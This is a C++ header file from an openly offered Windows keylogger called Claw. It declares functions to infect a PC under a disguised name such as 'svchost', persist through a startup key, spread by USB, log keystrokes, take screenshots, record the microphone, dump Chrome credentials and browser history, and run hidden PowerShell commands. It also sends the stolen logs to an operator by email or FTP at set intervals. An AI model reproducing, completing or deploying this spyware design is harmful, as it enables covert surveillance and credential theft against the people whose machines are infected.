src/claw.h

1. /*
2.  
3. Author: Fahad (QuantumCore)
4.  
5. https://github.com/quantumcore
6. https://quantumcored.com
7.  
8. claw.h (c) 2020
9.  
10. CLAW KEYLOGGER
11. */
12.  
13. //====================
14. #ifndef Claw_C
15. #define Claw_C
16.  
17. #include <algorithm>
18. #include <string>
19. #include <sstream>
20. #include <fstream>
21. #include <windows.h>
22. #include <limits>
23. #include <tchar.h>
24. #include <TlHelp32.h>
25. #include <shlobj.h>
26. #include <ctime>
27. #include <gdiplus.h>
28. #include <wininet.h>
29. //====================
30.  
31. #define UNLEN 256
32.  
33. //====================
34. // Threads
35. DWORD WINAPI NOTIFIER(LPVOID lpParameter);
36. DWORD WINAPI USBINFECT(LPVOID lpParameter);
37. //====================
38.  
39. class Claw {
40.     public:
41.  
42.     std::string DELIVERY_USER = ""; // the Delivery Username / Email
43.     std::string DELIVERY_PASS = ""; // the Delivery Password
44.     std::string FTP_SERVER = ""; // FTP Server (if used)
45.     std::string INSTALL_NAME = ""; // The name to infect the pc as
46.     std::string strTimeInterval = ""; // Time interval to send logs
47.     std::string DELIVERY_METHOD = ""; // Delivery method, ftp or smtp
48.     std::string MIC_OPTION = ""; // To Record Mic or not
49.     std::string HQ = ""; // HQ is the Install location
50.     std::string SCREENSHOTFILENAME; // 1st Screenshot filename
51.     std::string SECONDSCREENSHOT; // 2nd Screenshot filename
52.     std::string MICFILENAME; // Mic Recording filename
53.  
54.     unsigned int TIME_INTERVAL = 0; // The time interval string, On line 39, is later converted to unsigned int, Stored here.
55.     WIN32_FIND_DATA data;
56.  
57.     std::string random_string( size_t length ); // returns random string
58.     //============================
59.     std::string initial_install_directory(); // Returns Initial Install directory
60.     //============================
61.     void copyFile(const char* source, const char* dest); // Copy file
62.     //============================
63.     void _infect(); // Infect the system
64.     //============================
65.     void StartupKey(const char* czExePath); // Add to Startup
66.     //============================  
67.     std::string Dir(); // Get Current Directory
68.     //============================
69.     void replaceAll( std::string &s, const std::string &search, const std::string &replace ); // This function is used
70.     // To replace all instances of a string in an another string.
71.     //============================
72.     bool SendMail(std::string message, std::string subject); // Send Email
73.     //============================
74.     void split(char* src, char* dest[5],  const char* delimeter) ; // Split string, C style.
75.     //============================
76.     void ProcessDelivery(); // Log Delivery Processing
77.     //============================
78.     std::string MyLocation(); // Returns Location of Claw Keylogger
79.     //============================
80.     std::istream& ignoreline(std::ifstream& in, std::ifstream::pos_type& pos); // ignores a line being read from a file.
81.     //============================
82.     std::string getLastLine(std::ifstream& in); // Gets the Last line of the file
83.     //============================
84.  
85.  
86.     /*
87.     Gets Keylogger Reqiured INFORMATION.
88.  
89.     Information is written in the EXE at the End of File.
90.     This function, Reads the last line and loads the information required.
91.     Claw cannot run without it.
92.     Information format : (protocol)[](server/email)[](password)[](install_name)[](time_interval)[](mic_option)
93.     Example :
94.  
95.     smtp[]mygmail@gmail.com[]mygmailpassword[]svchost[]300000[]1  
96.         |- Sends Logs to Email on mygmail@gmail.com. Infects the PC with name 'svchost'.
97.         |- Sends Logs every 5 Minutes, With Mic Recording.
98.  
99.     ftp[]myserver.com,username[]myftpserverpass[]svchost[]300000[]0
100.         |- Sends Logs to FTP on myserver.com. Infects the PC with name 'svchost'.
101.         |- Sends Logs every 5 Minutes, Without Mic Recording.
102.         |- see claw.cpp line 399 for details on ftp innformaton parsing
103.  
104.     This information is split into an array using '[]' as it's delimeter.
105.     Delimeter can be changed, It should be something that must not be in any other setting as it will be split too.
106.     The current delimeter is recommended to not be changed.
107.  
108.     Time Intervals that Claw uses are 300000ms (5 minutes), 600000ms (10 minutes), and 900000 (15 minutes)
109.    
110.     */
111.     std::string GetKeyLoggerInformation();
112.     //============================
113.     DWORD ProcessId(LPCTSTR ProcessName); // GET PID of a Process by Name
114.     //============================
115.     BOOL isFile(const char* file); // Check if a file exists, Returns TRUE if it does, FALSE if it does not.
116.     //============================
117.     std::string readFileContents(const char* file); // Returns the contents of a file.
118.     //============================
119.     std::string ExecuteOutFile(const char* command, const char* output_filename); // Execute a PS Command and Redirect output to file.
120.     //============================
121.     void ExecuteSilent(const char* command); // Execute a PS Command Silently
122.     //============================
123.     void ExecuteCommandPrompt(const char* command); // Execute a Command in CMD.
124.     //============================
125.     std::string DumpChromeCredentials(); // Dump Google Chrome Credentials
126.     //============================
127.     void DumpBrowserHistory(); // Dump Browser history
128.     //============================
129.     bool hookShift(); // Get shift status
130.     //============================
131.     bool capsLock(); // Get capslock status
132.     //============================
133.     int filter(int key); // Filters keys
134.     //============================
135.     void Keylogger(); // The Keylogger
136.     //============================
137.     std::string KeylogFileName(); // returns Keylogger filename
138.     //===========================
139.     std::string WindowStamp(); // returns Window Name + Timestamp
140.     //===========================
141.     void ScreenShot(std::string JPEG_FILENAME); // Takes Screenshot of the Entire Screen.
142.     //===========================
143.     std::string WANIP(); // Returns WAN IP Address
144.     //===========================
145.     std::string UserPC(); // Returns User / PC.
146.     //===========================
147.     void RecordMic(); // Records Mic.
148. };
149.  
150.  
151.  
152. #endif // ! Claw